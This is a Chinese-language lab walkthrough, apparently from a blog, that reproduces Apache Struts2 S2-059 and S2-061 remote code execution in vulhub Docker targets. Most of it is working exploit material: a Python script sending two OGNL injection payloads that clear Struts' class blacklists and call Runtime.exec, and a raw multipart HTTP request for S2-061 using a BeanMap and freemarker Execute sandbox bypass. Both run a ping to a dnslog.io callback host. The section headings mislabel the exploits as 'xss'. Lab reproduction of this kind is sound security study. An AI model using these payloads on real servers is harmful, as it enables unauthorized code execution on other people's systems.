status s2-059

xss-1

首先搭建靶场

git clone https://github.com/vulhub/vulhub.git
cd vulhub/struts2/s2-059
docker-compose up -d
# 建议换源操作网易源是个不错的选择
# http://hub-mirror.c.163.com

xss-2

进入页面,这个页面

640

上poc(官网的没回显)

https://dnslog.io/ 下面IP和dns地址记得修改

import requests
url = "http://127.0.0.1:8080"
data1 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('ping ??.dnslog.io'))}"
}
res1 = requests.post(url, data=data1)
# print(res1.text)
res2 = requests.post(url, data=data2)
# print(res2.text)

ojbk

status s2-61

xss-3

官网这个链接有毒 https://vulhub.org/#/environments/struts2/s2-061/

还是老老实实访问 vulhub/struts2/s2-061/Readme.zh-cn.md吧

cd vulhub/struts2/s2-061
docker-compose up -d

bp抓包发送给重发器,https://dnslog.io/ 下面IP和dns地址记得修改

上poc

POST /index.action HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 790

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'ping ??.dnslog.io'}).(#res=#exec.exec(#cmd))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

又Get到了一个新功能,记得收藏哦,收藏这个 dnslog.io

推荐:阿乐你好
靶场:vulhub
星球:网络安全0day共享库